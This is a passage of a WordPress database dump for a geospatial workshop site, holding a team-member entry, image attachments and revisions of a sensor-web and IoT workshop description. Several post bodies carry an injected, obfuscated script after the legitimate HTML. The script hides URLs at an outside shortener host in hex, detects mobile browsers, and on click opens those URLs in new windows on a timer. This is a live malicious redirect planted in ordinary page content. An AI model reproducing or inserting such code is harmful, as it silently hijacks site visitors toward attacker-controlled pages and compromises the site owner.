_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Daniele Oxoli</strong>','','publish','closed','closed','','daniele-oxoli','','','2022-12-06 04:53:24','2022-12-06 04:53:24','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3393',0,'dt_team','',0),
(3394,1,'2022-12-06 04:52:45','2022-12-06 04:52:45','','w233','','inherit','open','closed','','w233','','','2022-12-06 04:52:45','2022-12-06 04:52:45','',3393,'https://gsw2023.com/wp-content/uploads/2022/12/w233.jpg',0,'attachment','image/jpeg',0),
(3395,1,'2022-12-06 05:02:25','2022-12-06 05:02:25','<p>[vc_row][vc_column][/vc_column][vc_column width=\"1/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:02:25','2022-12-06 05:02:25','',3386,'https://gsw2023.com/?p=3395',0,'revision','',0),
(3396,1,'2022-12-06 05:04:09','2022-12-06 05:04:09','','ws23','','inherit','open','closed','','ws23-2','','','2022-12-06 05:04:09','2022-12-06 05:04:09','',3386,'https://gsw2023.com/wp-content/uploads/2022/12/ws23-1.jpg',0,'attachment','image/jpeg',0),
(3397,1,'2022-12-06 05:04:39','2022-12-06 05:04:39','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 